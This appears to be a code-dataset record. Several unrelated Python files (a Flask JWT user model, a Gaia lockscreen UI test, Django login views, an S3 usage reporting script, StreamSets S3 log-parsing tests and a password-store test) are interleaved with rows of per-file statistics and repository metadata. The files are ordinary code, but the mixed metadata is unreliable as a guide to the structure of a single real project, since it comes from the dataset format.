    admin = db.Column(db.Boolean, nullable=False, default=False)

    def __init__(self, email, username, password, name, age, address, admin=False):
        """Create a user; *password* is bcrypt-hashed before being stored."""
        self.email = email
        self.username = username
        self.password = bcrypt.generate_password_hash(
            password, app.config.get('BCRYPT_LOG_ROUNDS')
        ).decode()
        self.name = name
        self.age = age
        self.address = address
        self.registered_on = datetime.datetime.now()
        self.admin = admin

    def encode_auth_token(self, user_id):
        """
        Generates the Auth Token
        :return: string
        """
        try:
            payload = {
                # Token lifetime: 5 seconds from now.
                'exp': datetime.datetime.utcnow() + datetime.timedelta(days=0, seconds=5),
                'iat': datetime.datetime.utcnow(),
                'sub': user_id
            }
            return jwt.encode(
                payload,
                app.config.get('SECRET_KEY'),
                algorithm='HS256'
            )
        except Exception as e:
            # NOTE(review): returning the exception instead of raising forces
            # every caller to type-check the result; consider re-raising.
            return e

    @staticmethod
    def decode_auth_token(auth_token):
        """
        Validates the auth token
        :param auth_token:
        :return: integer|string
        """
        try:
            # NOTE(review): PyJWT >= 2.0 requires an explicit
            # algorithms=['HS256'] argument here -- confirm the pinned
            # PyJWT version before upgrading.
            payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))
            is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
            if is_blacklisted_token:
                return 'Token blacklisted. Please log in again.'
            else:
                return payload['sub']
        except jwt.ExpiredSignatureError:
            return 'Signature expired. Please log in again.'
        except jwt.InvalidTokenError:
            return 'Invalid token. Please log in again.'
class BlacklistToken(db.Model):
    """
    Token Model for storing JWT tokens that have been invalidated (log out)
    """
    __tablename__ = 'blacklist_tokens'

    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    token = db.Column(db.String(500), unique=True, nullable=False)
    blacklisted_on = db.Column(db.DateTime, nullable=False)

    def __init__(self, token):
        self.token = token
        self.blacklisted_on = datetime.datetime.now()

    def __repr__(self):
        # BUG FIX: the original format string '<id: token: {}' was missing
        # the closing angle bracket.
        return '<id: token: {}>'.format(self.token)

    @staticmethod
    def check_blacklist(auth_token):
        """Return True if *auth_token* is present in the blacklist table."""
        res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
        return bool(res)
| 32.806122
| 90
| 0.612753
| 368
| 3,215
| 5.211957
| 0.296196
| 0.050052
| 0.062565
| 0.04171
| 0.18561
| 0.163712
| 0.163712
| 0.095933
| 0.095933
| 0.052138
| 0
| 0.009961
| 0.281804
| 3,215
| 97
| 91
| 33.14433
| 0.820702
| 0.080871
| 0
| 0.115942
| 0
| 0
| 0.07058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0.057971
| 0.043478
| 0.014493
| 0.492754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7caf56de8045038d74971a889dbed39c31d7bb50
| 1,306
|
py
|
Python
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
BReduardokramer/gaia
|
c00302cdcd435ab193e8365917cfc6abac9e4f2e
|
[
"Apache-2.0"
] | 1
|
2021-11-09T00:27:34.000Z
|
2021-11-09T00:27:34.000Z
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from gaiatest import GaiaTestCase
from gaiatest.apps.lockscreen.app import LockScreen
class TestCameraUnlockWithPasscode(GaiaTestCase):
    # Passcode-locked lockscreen -> camera flow: the camera opened from the
    # lockscreen must keep the gallery button hidden (device still locked),
    # including after switching the camera source.

    # Input data
    _input_passcode = '7931'

    def setUp(self):
        GaiaTestCase.setUp(self)
        # Turn off geolocation prompt
        self.apps.set_permission('System', 'geolocation', 'deny')
        # Enable the passcode lock BEFORE locking the screen below.
        self.data_layer.set_setting('lockscreen.passcode-lock.code', self._input_passcode)
        self.data_layer.set_setting('lockscreen.passcode-lock.enabled', True)
        # this time we need it locked!
        self.lockscreen.lock()
        self.lock_screen = LockScreen(self.marionette)

    def test_unlock_to_camera_with_passcode(self):
        # https://github.com/mozilla/gaia-ui-tests/issues/479
        camera = self.lock_screen.unlock_to_camera()
        self.lock_screen.wait_for_lockscreen_not_visible()
        camera.switch_to_camera_frame()
        # Gallery button must stay hidden while the device is locked...
        self.assertFalse(camera.is_gallery_button_visible)
        # ...and must remain hidden after toggling the camera source.
        camera.tap_switch_source()
        camera.wait_for_capture_ready()
        self.assertFalse(camera.is_gallery_button_visible)
| 31.095238
| 90
| 0.717458
| 173
| 1,306
| 5.202312
| 0.520231
| 0.026667
| 0.046667
| 0.035556
| 0.195556
| 0.195556
| 0.195556
| 0.1
| 0
| 0
| 0
| 0.010427
| 0.19219
| 1,306
| 41
| 91
| 31.853659
| 0.842654
| 0.238897
| 0
| 0.105263
| 0
| 0
| 0.087221
| 0.061866
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.105263
| false
| 0.263158
| 0.105263
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7cb2d3d2cb22c43c3c911d744e22c33bc37cdf49
| 1,661
|
py
|
Python
|
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, render_to_response, redirect
from django.contrib import auth
from django.contrib.auth.forms import UserCreationForm
from django.template.context_processors import csrf
from django.http import HttpResponseRedirect
def login(request):
    """Login view: authenticate on POST, otherwise show the login form.

    Successful authentication redirects to /main; a failed attempt re-renders
    the form with a ``login_error`` message in the context.
    """
    context = {}
    context.update(csrf(request))

    if request.POST:
        user = auth.authenticate(
            username=request.POST.get('username'),
            password=request.POST.get('password'),
        )
        if user is not None:
            auth.login(request, user)
            return redirect('/main')
        context['login_error'] = "Пользователь не найден или пароль введен неверный пароль"

    return render_to_response('login.html', context)
def reg(request):
    """Registration view: create a user, log them in, redirect to /main.

    NOTE: the final render passes ``locals()`` as the template context, so
    reg.html sees whatever local names exist here (``error``,
    ``newuser_form``, ...).  Do not rename locals without checking the
    template.
    """
    # Any registration attempt starts from a logged-out session.
    auth.logout(request)
    error = ''
    if request.method == "POST":
        newuser_form = UserCreationForm(data = request.POST)
        if newuser_form.is_valid():
            newuser_form.save()
            # Authenticate with the just-registered credentials and log in.
            newuser = auth.authenticate(username = newuser_form.cleaned_data['username'], password = newuser_form.cleaned_data['password1'])
            auth.login(request, newuser)
            return redirect('/main')
        else:
            # Shown by the template on invalid form input.
            error = 'Проверьте правильность вводимых данных.'
    else:
        newuser_form = UserCreationForm()
    return render(request, 'reg.html', locals() )
def main(request):
    """Render the landing page with the current user's name in the context."""
    current_username = auth.get_user(request).username
    return render(request, 'index.html', {'username': current_username})
def logout(request):
    """End the current session and send the browser back to the login page."""
    auth.logout(request)
    response = HttpResponseRedirect("/login")
    return response
| 31.339623
| 140
| 0.668874
| 186
| 1,661
| 5.876344
| 0.327957
| 0.060384
| 0.043916
| 0.040256
| 0.064044
| 0.064044
| 0.064044
| 0
| 0
| 0
| 0
| 0.000777
| 0.225166
| 1,661
| 52
| 141
| 31.942308
| 0.848485
| 0
| 0
| 0.25
| 0
| 0
| 0.123494
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0.075
| 0.125
| 0.025
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7cda6328ac58b61f05923cca8623aa6b42f94561
| 3,591
|
py
|
Python
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 13
|
2016-10-07T20:25:11.000Z
|
2022-02-23T06:33:59.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 427
|
2016-08-17T18:03:32.000Z
|
2022-03-31T10:46:12.000Z
|
lib/reindex/reporting.py
|
scality/utapi
|
29475f1b9aa25cf3c883262bfb6f4573f846a5b7
|
[
"Apache-2.0"
] | 5
|
2017-04-25T21:13:03.000Z
|
2018-01-23T00:21:06.000Z
|
import requests
import redis
import json
import ast
import sys
import time
import urllib
import re
import sys
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
import argparse
def get_options():
    """Parse the command-line options for the reporting script.

    Returns an argparse.Namespace with sentinel connection settings, the
    optional Redis AUTH password and the bucketd endpoint URL.
    """
    opt_parser = argparse.ArgumentParser()
    opt_parser.add_argument("-i", "--sentinel-ip", default='127.0.0.1', help="Sentinel IP")
    opt_parser.add_argument("-p", "--sentinel-port", default="16379", help="Sentinel Port")
    opt_parser.add_argument("-v", "--redis-password", default=None, help="Redis AUTH Password")
    opt_parser.add_argument("-n", "--sentinel-cluster-name", default='scality-s3', help="Redis cluster name")
    opt_parser.add_argument("-b", "--bucketd-addr", default='http://127.0.0.1:9000', help="URL of the bucketd server")
    return opt_parser.parse_args()
def safe_print(content):
    """Print *content* on its own line (small wrapper handed to the executor)."""
    print(str(content))
class askRedis():
    """Read utilization counters from the Redis master behind a sentinel.

    The constructor asks the sentinel for the current master address; each
    ``read`` opens a fresh connection to that master.
    """

    def __init__(self, ip="127.0.0.1", port="16379", sentinel_cluster_name="scality-s3", password=None):
        self._password = password
        sentinel = redis.Redis(host=ip, port=port, db=0, password=password)
        self._ip, self._port = sentinel.sentinel_get_master_addr_by_name(sentinel_cluster_name)

    def read(self, resource, name):
        """Return {'files': int, 'total_size': int} for a bucket or account.

        Falls back to zeros when either counter is missing or non-numeric.
        """
        master = redis.Redis(host=self._ip, port=self._port, db=0, password=self._password)
        total_size = master.get('s3:%s:%s:storageUtilized:counter' % (resource, name))
        files = master.get('s3:%s:%s:numberOfObjects:counter' % (resource, name))
        try:
            return {'files': int(files), "total_size": int(total_size)}
        except Exception:
            return {'files': 0, "total_size": 0}
class S3ListBuckets():
    """Enumerate (account, bucket) pairs from the bucketd metadata server."""

    def __init__(self, host='127.0.0.1:9000'):
        # Base URL of the bucketd server, e.g. 'http://127.0.0.1:9000'.
        self.bucketd_host = host

    def run(self):
        """Return a list of (userid, bucket_name) tuples.

        BUG FIX: the original fell through, on any non-200 response, to an
        unreachable ``return(self.userid, self.bucket, user, files,
        total_size)`` referencing attributes that do not exist, raising
        AttributeError.  A non-200 response now yields an empty list.
        """
        docs = []
        url = "%s/default/bucket/users..bucket" % self.bucketd_host
        session = requests.Session()
        r = session.get(url, timeout=30)
        if r.status_code == 200:
            payload = json.loads(r.text)
            for keys in payload['Contents']:
                key = keys["key"]
                # Keys look like '<userid>..|..<bucket>'; capture both parts.
                r1 = re.match(r"(\w+)..\|..(\w+.*)", key)
                docs.append(r1.groups())
        return docs
if __name__ == '__main__':
    options = get_options()
    # Connection settings reused for every askRedis instance below.
    redis_conf = dict(
        ip=options.sentinel_ip,
        port=options.sentinel_port,
        sentinel_cluster_name=options.sentinel_cluster_name,
        password=options.redis_password
    )
    P = S3ListBuckets(options.bucketd_addr)
    listbuckets = P.run()
    # Unique account ids across all buckets.
    userids = set([x for x, y in listbuckets])
    # max_workers=1 keeps output ordered while still decoupling printing.
    executor = ThreadPoolExecutor(max_workers=1)
    # Per-bucket report: each bucket plus its multipart-upload shadow bucket.
    for userid, bucket in listbuckets:
        U = askRedis(**redis_conf)
        data = U.read('buckets', bucket)
        content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
            userid, bucket, data["files"], data["total_size"])
        executor.submit(safe_print, content)
        data = U.read('buckets', 'mpuShadowBucket'+bucket)
        content = "Account:%s|Bucket:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
            userid, 'mpuShadowBucket'+bucket, data["files"], data["total_size"])
        executor.submit(safe_print, content)
    executor.submit(safe_print, "")
    # Per-account totals.
    for userid in sorted(userids):
        U = askRedis(**redis_conf)
        data = U.read('accounts', userid)
        content = "Account:%s|NumberOFfiles:%s|StorageCapacity:%s " % (
            userid, data["files"], data["total_size"])
        executor.submit(safe_print, content)
| 35.554455
| 114
| 0.634085
| 452
| 3,591
| 4.889381
| 0.292035
| 0.032579
| 0.038462
| 0.01086
| 0.184163
| 0.175113
| 0.158371
| 0.133937
| 0.133937
| 0.133937
| 0
| 0.021708
| 0.217488
| 3,591
| 101
| 115
| 35.554455
| 0.764769
| 0
| 0
| 0.109756
| 0
| 0
| 0.190145
| 0.076837
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0.073171
| 0.146341
| 0
| 0.292683
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7cfaab0b77af0b6c7c138ff09a0a82244c391f57
| 12,133
|
py
|
Python
|
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | null | null | null |
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | null | null | null |
stage/configuration/test_amazon_s3_origin.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | 1
|
2019-10-29T08:46:11.000Z
|
2019-10-29T08:46:11.000Z
|
import logging
import pytest
from streamsets.testframework.markers import aws, sdc_min_version
from streamsets.testframework.utils import get_random_string
logger = logging.getLogger(__name__)

# All test objects are written under this prefix in the bucket.
S3_SANDBOX_PREFIX = 'sandbox'

# Regex capture group -> record field mapping used by the REGEX log format.
LOG_FIELD_MAPPING = [{'fieldPath': '/date', 'group': 1},
                     {'fieldPath': '/time', 'group': 2},
                     {'fieldPath': '/timehalf', 'group': 3},
                     {'fieldPath': '/info', 'group': 4},
                     {'fieldPath': '/file', 'group': 5},
                     {'fieldPath': '/message', 'group': 6}]
REGULAR_EXPRESSION = r'(\S+) (\S+) (\S+) (\S+) (\S+) (.*)'
# log to be written int the file on s3
data_format_content = {
    'COMMON_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] '
                         '"GET /apache.gif HTTP/1.0" 200 232',
    'LOG4J': '200 [main] DEBUG org.StreamSets.Log4j unknown - This is sample log message',
    'APACHE_ERROR_LOG_FORMAT': '[Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client '
                               'denied by server configuration:/export/home/live/ap/htdocs/test',
    'COMBINED_LOG_FORMAT': '127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache.gif'
                           ' HTTP/1.0" 200 2326 "http://www.example.com/strt.html" "Mozilla/4.08'
                           ' [en] (Win98; I ;Nav)"',
    'APACHE_CUSTOM_LOG_FORMAT': '10.185.248.71 - - [09/Jan/2015:9:12:06 +0000] "GET '
                                '/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 '
                                'HTTP/1.1" 500 17 ',
    'CEF': '10.217.31.247 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=10.217.253.78 '
           'spt=53743 method=GET request=http://vpx247.example.net/FFC/login.html msg=Disallow Illegal URL.',
    'LEEF': 'LEEF: 2.0|Trend Micro|Deep Security Agent|<DSA version>|4000030|cat=Anti-Malware '
            'name=HEU_AEGIS_CRYPT desc=HEU_AEGIS_CRYPT sev=6 cn1=241 msg=Realtime',
    'REGEX': '2019-04-30 08:23:53 AM [INFO] [streamsets.sdk.sdc_api] Pipeline Filewriterpipeline53'}
# data to verify the output of amazon s3 origin.
get_data_to_verify_output = {
    'LOG4J': {'severity': 'DEBUG', 'relativetime': '200', 'thread': 'main', 'category': 'org.StreamSets.Log4j',
              'ndc': 'unknown', 'message': 'This is sample log message'},
    'COMMON_LOG_FORMAT': {'request': '/apache.gif', 'auth': 'frank', 'ident': '-', 'response': '200', 'bytes':
                          '232', 'clientip': '127.0.0.1', 'verb': 'GET', 'httpversion': '1.0', 'rawrequest': None,
                          'timestamp': '10/Oct/2000:13:55:36 -0700'},
    'APACHE_ERROR_LOG_FORMAT': {'message': 'client denied by server configuration:/export/home/live/ap/htdocs/'
                                           'test', 'timestamp': 'Wed Oct 11 14:32:52 2000', 'loglevel': 'error',
                                'clientip': '127.0.0.1'},
    'COMBINED_LOG_FORMAT': {'request': '/apache.gif', 'agent': '"Mozilla/4.08 [en] (Win98; I ;Nav)"', 'auth':
                            'frank', 'ident': '-', 'verb': 'GET', 'referrer': '"http://www.example.com/strt.'
                            'html"', 'response': '200', 'bytes': '2326', 'clientip': '127.0.0.1',
                            'httpversion': '1.0', 'rawrequest': None, 'timestamp': '10/Oct/2000:13:55:36 -0700'},
    'APACHE_CUSTOM_LOG_FORMAT': {'remoteUser': '-', 'requestTime': '09/Jan/2015:9:12:06 +0000', 'request': 'GET '
                                 '/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300 HTTP/1.1',
                                 'logName': '-', 'remoteHost': '10.185.248.71', 'bytesSent': '17', 'status': '500'},
    'CEF': {'severity': '6', 'product': 'NetScaler', 'extensions': {'msg': 'Disallow Illegal URL.', 'request':
            'http://vpx247.example.net/FFC/login.html', 'method': 'GET', 'src': '10.217.253.78', 'spt': '53743'},
            'signature': 'APPFW', 'vendor': 'Citrix', 'cefVersion': 0, 'name': 'APPFW_STARTURL',
            'version': 'NS10.0'},
    'GROK': {'request': '/inventoryServic/inventory/purchaseItem?userId=20253471&itemId=23434300', 'auth': '-',
             'ident': '-', 'response': '500', 'bytes': '17', 'clientip': '10.185.248.71', 'verb': 'GET',
             'httpversion': '1.1', 'rawrequest': None, 'timestamp': '09/Jan/2015:9:12:06 +0000'},
    'LEEF': {'eventId': '4000030', 'product': 'Deep Security Agent', 'extensions': {'cat': 'Realtime'},
             'leefVersion': 2.0, 'vendor': 'Trend Micro', 'version': '<DSA version>'},
    'REGEX': {'/time': '08:23:53', '/date': '2019-04-30', '/timehalf': 'AM',
              '/info': '[INFO]', '/message': 'Pipeline Filewriterpipeline53', '/file': '[streamsets.sdk.sdc_api]'}}
# Placeholder tests, one per configuration option of the Amazon S3 stage.
# All are skipped until implemented; the parametrize decorators document the
# value space each option accepts.
@pytest.mark.skip('Not yet implemented')
def test_configuration_access_key_id(sdc_builder, sdc_executor):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_bucket(sdc_builder, sdc_executor):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_connection_timeout(sdc_builder, sdc_executor):
    pass

@pytest.mark.parametrize('task', ['CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_content(sdc_builder, sdc_executor, task):
    pass

@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.parametrize('delete_original_object', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_delete_original_object(sdc_builder, sdc_executor, task, delete_original_object):
    pass

@pytest.mark.parametrize('region', ['OTHER'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_endpoint(sdc_builder, sdc_executor, region):
    pass

@pytest.mark.parametrize('task', ['COPY_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_new_object_path(sdc_builder, sdc_executor, task):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_object(sdc_builder, sdc_executor):
    pass

@pytest.mark.parametrize('on_record_error', ['DISCARD', 'STOP_PIPELINE', 'TO_ERROR'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_on_record_error(sdc_builder, sdc_executor, on_record_error):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_preconditions(sdc_builder, sdc_executor):
    pass

@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_host(sdc_builder, sdc_executor, use_proxy):
    pass

@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_password(sdc_builder, sdc_executor, use_proxy):
    pass

@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_port(sdc_builder, sdc_executor, use_proxy):
    pass

@pytest.mark.parametrize('use_proxy', [True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_proxy_user(sdc_builder, sdc_executor, use_proxy):
    pass

@pytest.mark.parametrize('region', ['AP_NORTHEAST_1', 'AP_NORTHEAST_2', 'AP_NORTHEAST_3', 'AP_SOUTHEAST_1', 'AP_SOUTHEAST_2', 'AP_SOUTH_1', 'CA_CENTRAL_1', 'CN_NORTHWEST_1', 'CN_NORTH_1', 'EU_CENTRAL_1', 'EU_WEST_1', 'EU_WEST_2', 'EU_WEST_3', 'OTHER', 'SA_EAST_1', 'US_EAST_1', 'US_EAST_2', 'US_GOV_WEST_1', 'US_WEST_1', 'US_WEST_2'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_region(sdc_builder, sdc_executor, region):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_required_fields(sdc_builder, sdc_executor):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_retry_count(sdc_builder, sdc_executor):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_secret_access_key(sdc_builder, sdc_executor):
    pass

@pytest.mark.skip('Not yet implemented')
def test_configuration_socket_timeout(sdc_builder, sdc_executor):
    pass

@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_tags(sdc_builder, sdc_executor, task):
    pass

@pytest.mark.parametrize('task', ['CHANGE_EXISTING_OBJECT', 'COPY_OBJECT', 'CREATE_NEW_OBJECT'])
@pytest.mark.skip('Not yet implemented')
def test_configuration_task(sdc_builder, sdc_executor, task):
    pass

@pytest.mark.parametrize('use_proxy', [False, True])
@pytest.mark.skip('Not yet implemented')
def test_configuration_use_proxy(sdc_builder, sdc_executor, use_proxy):
    pass
@aws('s3')
@pytest.mark.parametrize('data_format', ['LOG'])
@pytest.mark.parametrize('log_format', ['COMMON_LOG_FORMAT', 'APACHE_ERROR_LOG_FORMAT', 'COMBINED_LOG_FORMAT',
                                        'APACHE_CUSTOM_LOG_FORMAT', 'REGEX', 'GROK', 'LOG4J', 'CEF', 'LEEF'])
def test_configurations_data_format_log(sdc_executor, sdc_builder, aws, data_format, log_format):
    """Check whether S3 origin can parse different log format or not. A log file is being created in s3 bucket
    mentioned below .S3 origin reads the log file and parse the same.
    Pipeline for the same-
        s3_origin >> trash
        s3_origin >= pipeline_finisher_executor
    """
    # GROK has no sample of its own: it parses the Apache custom-log sample.
    if log_format == 'GROK':
        file_content = data_format_content['APACHE_CUSTOM_LOG_FORMAT']
    else:
        file_content = data_format_content[log_format]
    client = aws.s3
    # Unique per-run prefix so parallel runs do not collide.
    s3_key = f'{S3_SANDBOX_PREFIX}/{get_random_string()}'
    attributes = {'bucket': aws.s3_bucket_name,
                  'prefix_pattern': f'{s3_key}/*',
                  'number_of_threads': 1,
                  'read_order': 'LEXICOGRAPHICAL',
                  'data_format': data_format,
                  'log_format': log_format,
                  'custom_log_format': '%h %l %u [%t] "%r" %>s %b',
                  'regular_expression': REGULAR_EXPRESSION,
                  'field_path_to_regex_group_mapping': LOG_FIELD_MAPPING
                  }
    pipeline = get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws)
    s3_origin = pipeline.origin_stage
    try:
        # Upload the sample log, run the pipeline and compare the parsed
        # record against the expected-output table.
        client.put_object(Bucket=aws.s3_bucket_name, Key=f'{s3_key}/{get_random_string()}.log', Body=file_content)
        output_records = execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline)
        assert output_records[0].field == get_data_to_verify_output[log_format]
    finally:
        # Always stop the pipeline (if still running) and remove test objects.
        if sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING':
            sdc_executor.stop_pipeline(pipeline)
        # cleaning up s3 bucket
        delete_aws_objects(client, aws, s3_key)
def get_aws_origin_to_trash_pipeline(sdc_builder, attributes, aws):
    """Build and return a pipeline: Amazon S3 origin >> Trash.

    A Pipeline Finisher Executor is wired to the origin's event lane so the
    pipeline stops itself on the 'no-more-data' event; retries are disabled.
    """
    pipeline_builder = sdc_builder.get_pipeline_builder()
    pipeline_builder.add_error_stage('Discard')

    origin = pipeline_builder.add_stage('Amazon S3', type='origin')
    origin.set_attributes(**attributes)

    trash_stage = pipeline_builder.add_stage('Trash')
    finisher = pipeline_builder.add_stage('Pipeline Finisher Executor')
    finisher.set_attributes(stage_record_preconditions=["${record:eventType() == 'no-more-data'}"])

    origin >> trash_stage
    origin >= finisher

    built_pipeline = pipeline_builder.build().configure_for_environment(aws)
    built_pipeline.configuration['shouldRetry'] = False
    return built_pipeline
def delete_aws_objects(client, aws, s3_key):
    """Delete every object under *s3_key* in the test bucket (S3 cleanup)."""
    bucket = aws.s3_bucket_name
    contents = client.list_objects_v2(Bucket=bucket, Prefix=s3_key)['Contents']
    delete_keys = {'Objects': [{'Key': entry['Key']} for entry in contents]}
    client.delete_objects(Bucket=bucket, Delete=delete_keys)
def execute_pipeline_and_get_output(sdc_executor, s3_origin, pipeline):
    """Run *pipeline* once with snapshot capture; return the origin's output records."""
    sdc_executor.add_pipeline(pipeline)
    snapshot = sdc_executor.capture_snapshot(pipeline, start_pipeline=True).snapshot
    return snapshot[s3_origin].output
| 46.84556
| 334
| 0.656556
| 1,539
| 12,133
| 4.925926
| 0.223522
| 0.050125
| 0.040628
| 0.049334
| 0.502308
| 0.45614
| 0.441367
| 0.397705
| 0.351801
| 0.311305
| 0
| 0.050808
| 0.193769
| 12,133
| 258
| 335
| 47.027132
| 0.724187
| 0.031979
| 0
| 0.26178
| 0
| 0.04712
| 0.359911
| 0.071111
| 0
| 0
| 0
| 0
| 0.005236
| 1
| 0.136126
| false
| 0.120419
| 0.020942
| 0
| 0.167539
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6b00216e5015b612b495eca186f46004bdc92b04
| 1,824
|
py
|
Python
|
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
test/test_storage.py
|
jrabasco/PyPasser
|
3cc6ecdfa9b5fe22f5a88c221517fe09d2df9db6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.4
__author__ = "Jeremy Rabasco"
import sys
import os
# Make the project root importable when the tests are run from test/.
sys.path.append("..")
import unittest
from modules import storage
from modules.service import Service
from modules.database import Database
class TestStorage(unittest.TestCase):
    """Round-trip tests for modules.storage write/read on Service and Database."""

    def setUp(self):
        self.service = Service()
        self.database = Database()
        # Ensure both target files exist (and are truncated) before each test.
        open("test.service", "w+").close()
        open("test.db", "w+").close()

    def test_write_read_service(self):
        self.service.service_name = "Hello"
        self.service.username = "This"
        self.service.password = "Works"
        storage.write("test", self.service, "test.service")

        restored = Service()
        storage.read("test", restored, "test.service")

        self.assertEqual(restored.service_name, self.service.service_name)
        self.assertEqual(restored.username, self.service.username)
        self.assertEqual(restored.password, self.service.password)

    def test_write_read_database(self):
        self.database.add_service(Service())
        self.database.add_service(Service())
        self.database.name = "Hey"
        storage.write("test", self.database, "test.db")

        restored = Database()
        storage.read("test", restored, "test.db")

        self.assertEqual(restored.name, self.database.name)
        # Every stored service must survive the round trip field-for-field.
        for i, original in enumerate(self.database.services):
            self.assertEqual(restored.services[i].service_name, original.service_name)
            self.assertEqual(restored.services[i].username, original.username)
            self.assertEqual(restored.services[i].password, original.password)

    def tearDown(self):
        os.remove(os.getcwd() + "/test.service")
